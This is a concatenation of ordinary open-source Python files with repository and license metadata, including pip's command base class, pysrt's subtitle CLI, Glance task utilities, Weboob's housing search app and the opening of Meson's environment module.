opts.debug, '--xunit-file', opts.xunit_file)] for s1, o1, s2, o2 in conflicts: if o1 and o2: sys.stderr.write('options %s and %s are mutually exclusive\n' % (s1, s2)) return 2 shellcmd = _which(opts.shell) if not shellcmd: stderrb.write(b('shell not found: ') + fsencode(opts.shell) + b('\n')) return 2 shell = [shellcmd] if opts.shell_opts: shell += shlex.split(opts.shell_opts) patchcmd = None if opts.interactive: patchcmd = _which('patch') if not patchcmd: sys.stderr.write('patch(1) required for -i\n') return 2 if not paths: sys.stdout.write(getusage()) return 2 badpaths = [path for path in paths if not os.path.exists(path)] if badpaths: stderrb.write(b('no such file: ') + badpaths[0] + b('\n')) return 2 if opts.yes: answer = 'y' elif opts.no: answer = 'n' else: answer = None tmpdir = os.environ['CRAMTMP'] = tempfile.mkdtemp('', 'cramtests-') tmpdirb = fsencode(tmpdir) proctmp = os.path.join(tmpdir, 'tmp') for s in ('TMPDIR', 'TEMP', 'TMP'): os.environ[s] = proctmp os.mkdir(proctmp) try: tests = runtests(paths, tmpdirb, shell, indent=opts.indent, cleanenv=not opts.preserve_env, debug=opts.debug, noerrfiles=opts.no_err_files) if not opts.debug: tests = runcli(tests, quiet=opts.quiet, verbose=opts.verbose, patchcmd=patchcmd, answer=answer, noerrfiles=opts.no_err_files) if opts.xunit_file is not None: tests = runxunit(tests, opts.xunit_file) hastests = False failed = False for path, test in tests: hastests = True refout, postout, diff = test() if diff: failed = True if not hastests: sys.stderr.write('no tests found\n') return 2 return int(failed) finally: if opts.keep_tmpdir: stdoutb.write(b('# Kept temporary directory: ') + tmpdirb + b('\n')) else: shutil.rmtree(tmpdir)
gpl-2.0
SamuelMarks/edx-dl
edx_dl/common.py
4
1534
# -*- coding: utf-8 -*- """ Common type definitions and constants for edx-dl """ from collections import namedtuple # The next four named tuples represent the structure of courses in edX. The # structure is: # # * A Course contains Sections # * Each Section contains Subsections # * Each Subsection contains Units # # Notice that we don't represent the full tree structure for both performance # and UX reasons: # # Course -> [Section] -> [SubSection] -> [Unit] -> [Video] # # In the script the data structures used are: # # 1. The data structures to represent the course information: # Course, Section->[SubSection] # # 2. The data structures to represent the chosen courses and sections: # selections = {Course, [Section]} # # 3. The data structure of all the downloable resources which represent each # subsection via its URL and the of resources who can be extracted from the # Units it contains: # all_units = {Subsection.url: [Unit]} # # 4. The units can contain multiple videos: # Unit -> [Video] # Course = namedtuple('Course', ['id', 'name', 'url', 'state']) Section = namedtuple('Section', ['position', 'name', 'url', 'subsections']) SubSection = namedtuple('SubSection', ['position', 'name', 'url']) Unit = namedtuple('Unit', ['videos', 'resources_urls']) Video = namedtuple('Video', ['video_youtube_url', 'available_subs_url', 'sub_template_url', 'mp4_urls']) YOUTUBE_DL_CMD = ['youtube-dl', '--ignore-config'] DEFAULT_CACHE_FILENAME = 'edx-dl.cache'
lgpl-3.0
tobegit3hub/glance_docker
glance/common/scripts/utils.py
10
4580
# Copyright 2014 OpenStack Foundation # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. __all__ = [ 'get_task', 'unpack_task_input', 'set_base_image_properties', 'validate_location_uri', 'get_image_data_iter', ] from oslo_log import log as logging from six.moves import urllib from glance.common import exception from glance import i18n LOG = logging.getLogger(__name__) _ = i18n._ _LE = i18n._LE def get_task(task_repo, task_id): """Gets a TaskProxy object. :param task_repo: TaskRepo object used to perform DB operations :param task_id: ID of the Task """ task = None try: task = task_repo.get(task_id) except exception.NotFound: msg = _LE('Task not found for task_id %s') % task_id LOG.exception(msg) return task def unpack_task_input(task): """Verifies and returns valid task input dictionary. :param task: Task domain object """ task_input = task.task_input # NOTE: until we support multiple task types, we just check for # input fields related to 'import task'. for key in ["import_from", "import_from_format", "image_properties"]: if key not in task_input: msg = _("Input does not contain '%(key)s' field") % {"key": key} raise exception.Invalid(msg) return task_input def set_base_image_properties(properties=None): """Sets optional base properties for creating Image. :param properties: Input dict to set some base properties """ if isinstance(properties, dict) and len(properties) == 0: # TODO(nikhil): We can make these properties configurable while # implementing the pipeline logic for the scripts. The below shown # are placeholders to show that the scripts work on 'devstack' # environment. properties['disk_format'] = 'qcow2' properties['container_format'] = 'bare' def validate_location_uri(location): """Validate location uri into acceptable format. :param location: Location uri to be validated """ if not location: raise exception.BadStoreUri(_('Invalid location: %s') % location) elif location.startswith(('http://', 'https://')): return location # NOTE: file type uri is being avoided for security reasons, # see LP bug #942118 #1400966. elif location.startswith(("file:///", "filesystem:///")): msg = _("File based imports are not allowed. Please use a non-local " "source of image data.") # NOTE: raise Exception and let the encompassing block save # the error msg in the task.message. raise StandardError(msg) else: # TODO(nikhil): add other supported uris supported = ['http', ] msg = _("The given uri is not valid. Please specify a " "valid uri from the following list of supported uri " "%(supported)s") % {'supported': supported} raise urllib.error.URLError(msg) def get_image_data_iter(uri): """Returns iterable object either for local file or uri :param uri: uri (remote or local) to the datasource we want to iterate Validation/sanitization of the uri is expected to happen before we get here. """ # NOTE(flaper87): This is safe because the input uri is already # verified before the task is created. if uri.startswith("file://"): uri = uri.split("file://")[-1] # NOTE(flaper87): The caller of this function expects to have # an iterable object. FileObjects in python are iterable, therefore # we are returning it as is. # The file descriptor will be eventually cleaned up by the garbage # collector once its ref-count is dropped to 0. That is, when there # wont be any references pointing to this file. # # We're not using StringIO or other tools to avoid reading everything # into memory. Some images may be quite heavy. return open(uri, "r") return urllib.request.urlopen(uri)
apache-2.0
linuxdaemon/CloudBot
tests/core_tests/util_tests/test_textgen.py
3
1117
import re def test_textgenerator(): from cloudbot.util.textgen import TextGenerator generator = TextGenerator( [ '{thing} is {stuff}' ], { 'thing': ['a', 'b'], 'stuff': [ 'c', ('d', 2), ] } ) for s in generator.generate_strings(4): assert re.match(r'[ab] is [cd]', s) assert generator.get_template(0) == '{thing} is {stuff}' def test_textgen_default_tmpl(): from cloudbot.util.textgen import TextGenerator generator = TextGenerator( [ '{thing} is {stuff} {a}', '{thing} are {stuff} {a}', ], { 'thing': ['a', 'b'], 'stuff': [ 'c', ('d', 2), ] }, default_templates=[1], variables={'a': 'foo'} ) for s in generator.generate_strings(4): assert re.match(r'[ab] are [cd] foo', s) assert generator.get_template(0) == '{thing} is {stuff} {a}' assert generator.get_template(1) == '{thing} are {stuff} {a}'
gpl-3.0
AkhilHector/Rex.Inc
.env/lib/python2.7/site-packages/pip/basecommand.py
181
10617
"""Base Command class, and related routines""" from __future__ import absolute_import import logging import os import sys import optparse import warnings from pip import cmdoptions from pip.locations import running_under_virtualenv from pip.download import PipSession from pip.exceptions import (BadCommand, InstallationError, UninstallationError, CommandError, PreviousBuildDirError) from pip.compat import logging_dictConfig from pip.baseparser import ConfigOptionParser, UpdatingDefaultsHelpFormatter from pip.req import InstallRequirement, parse_requirements from pip.status_codes import ( SUCCESS, ERROR, UNKNOWN_ERROR, VIRTUALENV_NOT_FOUND, PREVIOUS_BUILD_DIR_ERROR, ) from pip.utils import get_prog, normalize_path from pip.utils.deprecation import RemovedInPip8Warning from pip.utils.logging import IndentingFormatter from pip.utils.outdated import pip_version_check __all__ = ['Command'] logger = logging.getLogger(__name__) class Command(object): name = None usage = None hidden = False log_streams = ("ext://sys.stdout", "ext://sys.stderr") def __init__(self, isolated=False): parser_kw = { 'usage': self.usage, 'prog': '%s %s' % (get_prog(), self.name), 'formatter': UpdatingDefaultsHelpFormatter(), 'add_help_option': False, 'name': self.name, 'description': self.__doc__, 'isolated': isolated, } self.parser = ConfigOptionParser(**parser_kw) # Commands should add options to this option group optgroup_name = '%s Options' % self.name.capitalize() self.cmd_opts = optparse.OptionGroup(self.parser, optgroup_name) # Add the general options gen_opts = cmdoptions.make_option_group( cmdoptions.general_group, self.parser, ) self.parser.add_option_group(gen_opts) def _build_session(self, options, retries=None, timeout=None): session = PipSession( cache=( normalize_path(os.path.join(options.cache_dir, "http")) if options.cache_dir else None ), retries=retries if retries is not None else options.retries, insecure_hosts=options.trusted_hosts, ) # Handle custom ca-bundles from the user if options.cert: session.verify = options.cert # Handle SSL client certificate if options.client_cert: session.cert = options.client_cert # Handle timeouts if options.timeout or timeout: session.timeout = ( timeout if timeout is not None else options.timeout ) # Handle configured proxies if options.proxy: session.proxies = { "http": options.proxy, "https": options.proxy, } # Determine if we can prompt the user for authentication or not session.auth.prompting = not options.no_input return session def parse_args(self, args): # factored out for testability return self.parser.parse_args(args) def main(self, args): options, args = self.parse_args(args) if options.quiet: if options.quiet == 1: level = "WARNING" if options.quiet == 2: level = "ERROR" else: level = "CRITICAL" elif options.verbose: level = "DEBUG" else: level = "INFO" logging_dictConfig({ "version": 1, "disable_existing_loggers": False, "filters": { "exclude_warnings": { "()": "pip.utils.logging.MaxLevelFilter", "level": logging.WARNING, }, }, "formatters": { "indent": { "()": IndentingFormatter, "format": ( "%(message)s" if not options.log_explicit_levels else "[%(levelname)s] %(message)s" ), }, }, "handlers": { "console": { "level": level, "class": "pip.utils.logging.ColorizedStreamHandler", "stream": self.log_streams[0], "filters": ["exclude_warnings"], "formatter": "indent", }, "console_errors": { "level": "WARNING", "class": "pip.utils.logging.ColorizedStreamHandler", "stream": self.log_streams[1], "formatter": "indent", }, "user_log": { "level": "DEBUG", "class": "pip.utils.logging.BetterRotatingFileHandler", "filename": options.log or "/dev/null", "delay": True, "formatter": "indent", }, }, "root": { "level": level, "handlers": list(filter(None, [ "console", "console_errors", "user_log" if options.log else None, ])), }, # Disable any logging besides WARNING unless we have DEBUG level # logging enabled. These use both pip._vendor and the bare names # for the case where someone unbundles our libraries. "loggers": dict( ( name, { "level": ( "WARNING" if level in ["INFO", "ERROR"] else "DEBUG" ), }, ) for name in ["pip._vendor", "distlib", "requests", "urllib3"] ), }) if options.log_explicit_levels: warnings.warn( "--log-explicit-levels has been deprecated and will be removed" " in a future version.", RemovedInPip8Warning, ) # TODO: try to get these passing down from the command? # without resorting to os.environ to hold these. if options.no_input: os.environ['PIP_NO_INPUT'] = '1' if options.exists_action: os.environ['PIP_EXISTS_ACTION'] = ' '.join(options.exists_action) if options.require_venv: # If a venv is required check if it can really be found if not running_under_virtualenv(): logger.critical( 'Could not find an activated virtualenv (required).' ) sys.exit(VIRTUALENV_NOT_FOUND) try: status = self.run(options, args) # FIXME: all commands should return an exit status # and when it is done, isinstance is not needed anymore if isinstance(status, int): return status except PreviousBuildDirError as exc: logger.critical(str(exc)) logger.debug('Exception information:', exc_info=True) return PREVIOUS_BUILD_DIR_ERROR except (InstallationError, UninstallationError, BadCommand) as exc: logger.critical(str(exc)) logger.debug('Exception information:', exc_info=True) return ERROR except CommandError as exc: logger.critical('ERROR: %s', exc) logger.debug('Exception information:', exc_info=True) return ERROR except KeyboardInterrupt: logger.critical('Operation cancelled by user') logger.debug('Exception information:', exc_info=True) return ERROR except: logger.critical('Exception:', exc_info=True) return UNKNOWN_ERROR finally: # Check if we're using the latest version of pip available if (not options.disable_pip_version_check and not getattr(options, "no_index", False)): with self._build_session( options, retries=0, timeout=min(5, options.timeout)) as session: pip_version_check(session) return SUCCESS class RequirementCommand(Command): @staticmethod def populate_requirement_set(requirement_set, args, options, finder, session, name, wheel_cache): """ Marshal cmd line args into a requirement set. """ for filename in options.constraints: for req in parse_requirements( filename, constraint=True, finder=finder, options=options, session=session, wheel_cache=wheel_cache): requirement_set.add_requirement(req) for req in args: requirement_set.add_requirement( InstallRequirement.from_line( req, None, isolated=options.isolated_mode, wheel_cache=wheel_cache ) ) for req in options.editables: requirement_set.add_requirement( InstallRequirement.from_editable( req, default_vcs=options.default_vcs, isolated=options.isolated_mode, wheel_cache=wheel_cache ) ) found_req_in_file = False for filename in options.requirements: for req in parse_requirements( filename, finder=finder, options=options, session=session, wheel_cache=wheel_cache): found_req_in_file = True requirement_set.add_requirement(req) if not (args or options.editables or found_req_in_file): opts = {'name': name} if options.find_links: msg = ('You must give at least one requirement to ' '%(name)s (maybe you meant "pip %(name)s ' '%(links)s"?)' % dict(opts, links=' '.join(options.find_links))) else: msg = ('You must give at least one requirement ' 'to %(name)s (see "pip help %(name)s")' % opts) logger.warning(msg)
mit
ThomasHabets/openvpn-debian
win/config_tap.py
5
1181
import os from wb import preprocess, home_fn, autogen, dict_def def main(config): preprocess(config, in_fn=home_fn('tap-win32/SOURCES.in'), out_fn=home_fn('tap-win32/SOURCES'), quote_begin='@@', quote_end='@@', head_comment='# %s\n\n' % autogen) preprocess(config, in_fn=home_fn('tap-win32/i386/OemWin2k.inf.in'), out_fn=home_fn('tap-win32/i386/OemWin2k.inf'), quote_begin='@@', quote_end='@@', if_prefix='!', head_comment='; %s\n\n' % autogen) try: os.mkdir(home_fn('tap-win32/amd64')) except: pass preprocess(dict_def(config, [('AMD64', '1')]), in_fn=home_fn('tap-win32/i386/OemWin2k.inf.in'), out_fn=home_fn('tap-win32/amd64/OemWin2k.inf'), quote_begin='@@', quote_end='@@', if_prefix='!', head_comment='; %s\n\n' % autogen) # if we are run directly, and not loaded as a module if __name__ == "__main__": from wb import config main(config)
gpl-2.0
blckshrk/Weboob
weboob/applications/flatboob/flatboob.py
1
6209
# -*- coding: utf-8 -*- # Copyright(C) 2012 Romain Bignon # # This file is part of weboob. # # weboob is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # weboob is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with weboob. If not, see <http://www.gnu.org/licenses/>. import sys from weboob.capabilities.housing import ICapHousing, Query from weboob.tools.application.repl import ReplApplication, defaultcount from weboob.tools.application.formatters.iformatter import IFormatter, PrettyFormatter __all__ = ['Flatboob'] class HousingFormatter(IFormatter): MANDATORY_FIELDS = ('id', 'title', 'cost', 'currency', 'area', 'date', 'text') def format_obj(self, obj, alias): result = u'%s%s%s\n' % (self.BOLD, obj.title, self.NC) result += 'ID: %s\n' % obj.fullid result += 'Cost: %s%s\n' % (obj.cost, obj.currency) result += u'Area: %sm²\n' % (obj.area) if obj.date: result += 'Date: %s\n' % obj.date.strftime('%Y-%m-%d') result += 'Phone: %s\n' % obj.phone if hasattr(obj, 'location') and obj.location: result += 'Location: %s\n' % obj.location if hasattr(obj, 'station') and obj.station: result += 'Station: %s\n' % obj.station if hasattr(obj, 'photos') and obj.photos: result += '\n%sPhotos%s\n' % (self.BOLD, self.NC) for photo in obj.photos: result += ' * %s\n' % photo.url result += '\n%sDescription%s\n' % (self.BOLD, self.NC) result += obj.text if hasattr(obj, 'details') and obj.details: result += '\n\n%sDetails%s\n' % (self.BOLD, self.NC) for key, value in obj.details.iteritems(): result += ' %s: %s\n' % (key, value) return result class HousingListFormatter(PrettyFormatter): MANDATORY_FIELDS = ('id', 'title', 'cost', 'text') def get_title(self, obj): return '%s%s - %s' % (obj.cost, obj.currency, obj.title) def get_description(self, obj): result = u'' if hasattr(obj, 'date') and obj.date: result += '%s - ' % obj.date.strftime('%Y-%m-%d') result += obj.text return result class Flatboob(ReplApplication): APPNAME = 'flatboob' VERSION = '0.h' COPYRIGHT = 'Copyright(C) 2012 Romain Bignon' DESCRIPTION = "Console application to search for housing." SHORT_DESCRIPTION = "search for housing" CAPS = ICapHousing EXTRA_FORMATTERS = {'housing_list': HousingListFormatter, 'housing': HousingFormatter, } COMMANDS_FORMATTERS = {'search': 'housing_list', 'info': 'housing', } def main(self, argv): self.load_config() return ReplApplication.main(self, argv) @defaultcount(10) def do_search(self, line): """ search Search for housing. Parameters are interactively asked. """ pattern = 'notempty' query = Query() query.cities = [] while pattern: if len(query.cities) > 0: print '\n%sSelected cities:%s %s' % (self.BOLD, self.NC, ', '.join([c.name for c in query.cities])) pattern = self.ask('Enter a city pattern (or empty to stop)', default='') if not pattern: break cities = [] for backend, city in self.weboob.do('search_city', pattern): cities.append(city) if len(cities) == 0: print ' Not found!' continue if len(cities) == 1: if city in query.cities: query.cities.remove(city) else: query.cities.append(city) continue r = 'notempty' while r != '': for i, city in enumerate(cities): print ' %s%2d)%s [%s] %s' % (self.BOLD, i+1, self.NC, 'x' if city in query.cities else ' ', city.name) r = self.ask(' Select cities (or empty to stop)', regexp='(\d+|)', default='') if not r.isdigit(): continue r = int(r) if r <= 0 or r > len(cities): continue city = cities[r-1] if city in query.cities: query.cities.remove(city) else: query.cities.append(city) query.area_min = self.ask_int('Enter min area') query.area_max = self.ask_int('Enter max area') query.cost_min = self.ask_int('Enter min cost') query.cost_max = self.ask_int('Enter max cost') query.nb_rooms = self.ask_int('Enter number of rooms') self.change_path([u'housings']) self.start_format() for backend, housing in self.do('search_housings', query): self.cached_format(housing) def ask_int(self, txt): r = self.ask(txt, default='', regexp='(\d+|)') if r: return int(r) return None def complete_info(self, text, line, *ignored): args = line.split(' ') if len(args) == 2: return self._complete_object() def do_info(self, _id): """ info ID Get information about a housing. """ if not _id: print >>sys.stderr, 'This command takes an argument: %s' % self.get_command_help('info', short=True) return 2 housing = self.get_object(_id, 'get_housing') if not housing: print >>sys.stderr, 'Housing not found: %s' % _id return 3 self.start_format() self.format(housing)
agpl-3.0
dannyboi104/SickRage
lib/pysrt/commands.py
71
8471
#!/usr/bin/env python # -*- coding: utf-8 -*- # pylint: disable-all import os import re import sys import codecs import shutil import argparse from textwrap import dedent from chardet import detect from pysrt import SubRipFile, SubRipTime, VERSION_STRING def underline(string): return "\033[4m%s\033[0m" % string class TimeAwareArgumentParser(argparse.ArgumentParser): RE_TIME_REPRESENTATION = re.compile(r'^\-?(\d+[hms]{0,2}){1,4}$') def parse_args(self, args=None, namespace=None): time_index = -1 for index, arg in enumerate(args): match = self.RE_TIME_REPRESENTATION.match(arg) if match: time_index = index break if time_index >= 0: args.insert(time_index, '--') return super(TimeAwareArgumentParser, self).parse_args(args, namespace) class SubRipShifter(object): BACKUP_EXTENSION = '.bak' RE_TIME_STRING = re.compile(r'(\d+)([hms]{0,2})') UNIT_RATIOS = { 'ms': 1, '': SubRipTime.SECONDS_RATIO, 's': SubRipTime.SECONDS_RATIO, 'm': SubRipTime.MINUTES_RATIO, 'h': SubRipTime.HOURS_RATIO, } DESCRIPTION = dedent("""\ Srt subtitle editor It can either shift, split or change the frame rate. """) TIMESTAMP_HELP = "A timestamp in the form: [-][Hh][Mm]S[s][MSms]" SHIFT_EPILOG = dedent("""\ Examples: 1 minute and 12 seconds foreward (in place): $ srt -i shift 1m12s movie.srt half a second foreward: $ srt shift 500ms movie.srt > othername.srt 1 second and half backward: $ srt -i shift -1s500ms movie.srt 3 seconds backward: $ srt -i shift -3 movie.srt """) RATE_EPILOG = dedent("""\ Examples: Convert 23.9fps subtitles to 25fps: $ srt -i rate 23.9 25 movie.srt """) LIMITS_HELP = "Each parts duration in the form: [Hh][Mm]S[s][MSms]" SPLIT_EPILOG = dedent("""\ Examples: For a movie in 2 parts with the first part 48 minutes and 18 seconds long: $ srt split 48m18s movie.srt => creates movie.1.srt and movie.2.srt For a movie in 3 parts of 20 minutes each: $ srt split 20m 20m movie.srt => creates movie.1.srt, movie.2.srt and movie.3.srt """) FRAME_RATE_HELP = "A frame rate in fps (commonly 23.9 or 25)" ENCODING_HELP = dedent("""\ Change file encoding. Useful for players accepting only latin1 subtitles. List of supported encodings: http://docs.python.org/library/codecs.html#standard-encodings """) BREAK_EPILOG = dedent("""\ Break lines longer than defined length """) LENGTH_HELP = "Maximum number of characters per line" def __init__(self): self.output_file_path = None def build_parser(self): parser = TimeAwareArgumentParser(description=self.DESCRIPTION, formatter_class=argparse.RawTextHelpFormatter) parser.add_argument('-i', '--in-place', action='store_true', dest='in_place', help="Edit file in-place, saving a backup as file.bak (do not works for the split command)") parser.add_argument('-e', '--output-encoding', metavar=underline('encoding'), action='store', dest='output_encoding', type=self.parse_encoding, help=self.ENCODING_HELP) parser.add_argument('-v', '--version', action='version', version='%%(prog)s %s' % VERSION_STRING) subparsers = parser.add_subparsers(title='commands') shift_parser = subparsers.add_parser('shift', help="Shift subtitles by specified time offset", epilog=self.SHIFT_EPILOG, formatter_class=argparse.RawTextHelpFormatter) shift_parser.add_argument('time_offset', action='store', metavar=underline('offset'), type=self.parse_time, help=self.TIMESTAMP_HELP) shift_parser.set_defaults(action=self.shift) rate_parser = subparsers.add_parser('rate', help="Convert subtitles from a frame rate to another", epilog=self.RATE_EPILOG, formatter_class=argparse.RawTextHelpFormatter) rate_parser.add_argument('initial', action='store', type=float, help=self.FRAME_RATE_HELP) rate_parser.add_argument('final', action='store', type=float, help=self.FRAME_RATE_HELP) rate_parser.set_defaults(action=self.rate) split_parser = subparsers.add_parser('split', help="Split a file in multiple parts", epilog=self.SPLIT_EPILOG, formatter_class=argparse.RawTextHelpFormatter) split_parser.add_argument('limits', action='store', nargs='+', type=self.parse_time, help=self.LIMITS_HELP) split_parser.set_defaults(action=self.split) break_parser = subparsers.add_parser('break', help="Break long lines", epilog=self.BREAK_EPILOG, formatter_class=argparse.RawTextHelpFormatter) break_parser.add_argument('length', action='store', type=int, help=self.LENGTH_HELP) break_parser.set_defaults(action=self.break_lines) parser.add_argument('file', action='store') return parser def run(self, args): self.arguments = self.build_parser().parse_args(args) if self.arguments.in_place: self.create_backup() self.arguments.action() def parse_time(self, time_string): negative = time_string.startswith('-') if negative: time_string = time_string[1:] ordinal = sum(int(value) * self.UNIT_RATIOS[unit] for value, unit in self.RE_TIME_STRING.findall(time_string)) return -ordinal if negative else ordinal def parse_encoding(self, encoding_name): try: codecs.lookup(encoding_name) except LookupError as error: raise argparse.ArgumentTypeError(error.message) return encoding_name def shift(self): self.input_file.shift(milliseconds=self.arguments.time_offset) self.input_file.write_into(self.output_file) def rate(self): ratio = self.arguments.final / self.arguments.initial self.input_file.shift(ratio=ratio) self.input_file.write_into(self.output_file) def split(self): limits = [0] + self.arguments.limits + [self.input_file[-1].end.ordinal + 1] base_name, extension = os.path.splitext(self.arguments.file) for index, (start, end) in enumerate(zip(limits[:-1], limits[1:])): file_name = '%s.%s%s' % (base_name, index + 1, extension) part_file = self.input_file.slice(ends_after=start, starts_before=end) part_file.shift(milliseconds=-start) part_file.clean_indexes() part_file.save(path=file_name, encoding=self.output_encoding) def create_backup(self): backup_file = self.arguments.file + self.BACKUP_EXTENSION if not os.path.exists(backup_file): shutil.copy2(self.arguments.file, backup_file) self.output_file_path = self.arguments.file self.arguments.file = backup_file def break_lines(self): split_re = re.compile(r'(.{,%i})(?:\s+|$)' % self.arguments.length) for item in self.input_file: item.text = '\n'.join(split_re.split(item.text)[1::2]) self.input_file.write_into(self.output_file) @property def output_encoding(self): return self.arguments.output_encoding or self.input_file.encoding @property def input_file(self): if not hasattr(self, '_source_file'): with open(self.arguments.file, 'rb') as f: content = f.read() encoding = detect(content).get('encoding') encoding = self.normalize_encoding(encoding) self._source_file = SubRipFile.open(self.arguments.file, encoding=encoding, error_handling=SubRipFile.ERROR_LOG) return self._source_file @property def output_file(self): if not hasattr(self, '_output_file'): if self.output_file_path: self._output_file = codecs.open(self.output_file_path, 'w+', encoding=self.output_encoding) else: self._output_file = sys.stdout return self._output_file def normalize_encoding(self, encoding): return encoding.lower().replace('-', '_') def main(): SubRipShifter().run(sys.argv[1:]) if __name__ == '__main__': main()
gpl-3.0
kionetworks/openstack-dashboard-havana
openstack_dashboard/openstack/common/gettextutils.py
23
7462
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2012 Red Hat, Inc. # All Rights Reserved. # Copyright 2013 IBM Corp. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ gettext for openstack-common modules. Usual usage in an openstack.common module: from openstack_dashboard.openstack.common.gettextutils import _ """ import copy import gettext import logging.handlers import os import UserString _localedir = os.environ.get('openstack_dashboard'.upper() + '_LOCALEDIR') _t = gettext.translation('openstack_dashboard', localedir=_localedir, fallback=True) def _(msg): return _t.ugettext(msg) def install(domain): """Install a _() function using the given translation domain. Given a translation domain, install a _() function using gettext's install() function. The main difference from gettext.install() is that we allow overriding the default localedir (e.g. /usr/share/locale) using a translation-domain-specific environment variable (e.g. NOVA_LOCALEDIR). """ gettext.install(domain, localedir=os.environ.get(domain.upper() + '_LOCALEDIR'), unicode=True) """ Lazy gettext functionality. The following is an attempt to introduce a deferred way to do translations on messages in OpenStack. We attempt to override the standard _() function and % (format string) operation to build Message objects that can later be translated when we have more information. Also included is an example LogHandler that translates Messages to an associated locale, effectively allowing many logs, each with their own locale. """ def get_lazy_gettext(domain): """Assemble and return a lazy gettext function for a given domain. Factory method for a project/module to get a lazy gettext function for its own translation domain (i.e. nova, glance, cinder, etc.) """ def _lazy_gettext(msg): """ Create and return a Message object encapsulating a string so that we can translate it later when needed. """ return Message(msg, domain) return _lazy_gettext class Message(UserString.UserString, object): """Class used to encapsulate translatable messages.""" def __init__(self, msg, domain): # _msg is the gettext msgid and should never change self._msg = msg self._left_extra_msg = '' self._right_extra_msg = '' self.params = None self.locale = None self.domain = domain @property def data(self): # NOTE(mrodden): this should always resolve to a unicode string # that best represents the state of the message currently localedir = os.environ.get(self.domain.upper() + '_LOCALEDIR') if self.locale: lang = gettext.translation(self.domain, localedir=localedir, languages=[self.locale], fallback=True) else: # use system locale for translations lang = gettext.translation(self.domain, localedir=localedir, fallback=True) full_msg = (self._left_extra_msg + lang.ugettext(self._msg) + self._right_extra_msg) if self.params is not None: full_msg = full_msg % self.params return unicode(full_msg) def _save_parameters(self, other): # we check for None later to see if # we actually have parameters to inject, # so encapsulate if our parameter is actually None if other is None: self.params = (other, ) else: self.params = copy.deepcopy(other) return self # overrides to be more string-like def __unicode__(self): return self.data def __str__(self): return self.data.encode('utf-8') def __getstate__(self): to_copy = ['_msg', '_right_extra_msg', '_left_extra_msg', 'domain', 'params', 'locale'] new_dict = self.__dict__.fromkeys(to_copy) for attr in to_copy: new_dict[attr] = copy.deepcopy(self.__dict__[attr]) return new_dict def __setstate__(self, state): for (k, v) in state.items(): setattr(self, k, v) # operator overloads def __add__(self, other): copied = copy.deepcopy(self) copied._right_extra_msg += other.__str__() return copied def __radd__(self, other): copied = copy.deepcopy(self) copied._left_extra_msg += other.__str__() return copied def __mod__(self, other): # do a format string to catch and raise # any possible KeyErrors from missing parameters self.data % other copied = copy.deepcopy(self) return copied._save_parameters(other) def __mul__(self, other): return self.data * other def __rmul__(self, other): return other * self.data def __getitem__(self, key): return self.data[key] def __getslice__(self, start, end): return self.data.__getslice__(start, end) def __getattribute__(self, name): # NOTE(mrodden): handle lossy operations that we can't deal with yet # These override the UserString implementation, since UserString # uses our __class__ attribute to try and build a new message # after running the inner data string through the operation. # At that point, we have lost the gettext message id and can just # safely resolve to a string instead. ops = ['capitalize', 'center', 'decode', 'encode', 'expandtabs', 'ljust', 'lstrip', 'replace', 'rjust', 'rstrip', 'strip', 'swapcase', 'title', 'translate', 'upper', 'zfill'] if name in ops: return getattr(self.data, name) else: return UserString.UserString.__getattribute__(self, name) class LocaleHandler(logging.Handler): """Handler that can have a locale associated to translate Messages. A quick example of how to utilize the Message class above. LocaleHandler takes a locale and a target logging.Handler object to forward LogRecord objects to after translating the internal Message. """ def __init__(self, locale, target): """ Initialize a LocaleHandler :param locale: locale to use for translating messages :param target: logging.Handler object to forward LogRecord objects to after translation """ logging.Handler.__init__(self) self.locale = locale self.target = target def emit(self, record): if isinstance(record.msg, Message): # set the locale and resolve to a string record.msg.locale = self.locale self.target.emit(record)
apache-2.0
MathieuDuponchelle/meson
mesonbuild/environment.py
1
54236
# Copyright 2012-2016 The Meson development team # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import configparser, os, platform, re, sys, shlex, shutil, subprocess from . import coredata from .linkers import ArLinker, ArmarLinker, VisualStudioLinker, DLinker, CcrxLinker from . import mesonlib from .mesonlib import MesonException, EnvironmentException, PerMachine, Popen_safe from . import mlog from . import compilers from .compilers import ( CompilerType, is_assembly, is_header, is_library, is_llvm_ir, is_object, is_source, ) from .compilers import ( ArmCCompiler, ArmCPPCompiler, ArmclangCCompiler, ArmclangCPPCompiler, ClangCCompiler, ClangCPPCompiler, ClangObjCCompiler, ClangObjCPPCompiler, ClangClCCompiler, ClangClCPPCompiler, G95FortranCompiler, GnuCCompiler, GnuCPPCompiler, GnuFortranCompiler, GnuObjCCompiler, GnuObjCPPCompiler, ElbrusCCompiler, ElbrusCPPCompiler, ElbrusFortranCompiler, IntelCCompiler, IntelCPPCompiler, IntelFortranCompiler, JavaCompiler, MonoCompiler, VisualStudioCsCompiler, NAGFortranCompiler, Open64FortranCompiler, PathScaleFortranCompiler, PGIFortranCompiler, RustCompiler, CcrxCCompiler, CcrxCPPCompiler, SunFortranCompiler, ValaCompiler, VisualStudioCCompiler, VisualStudioCPPCompiler, ) build_filename = 'meson.build' known_cpu_families = ( 'aarch64', 'arc', 'arm', 'e2k', 'ia64', 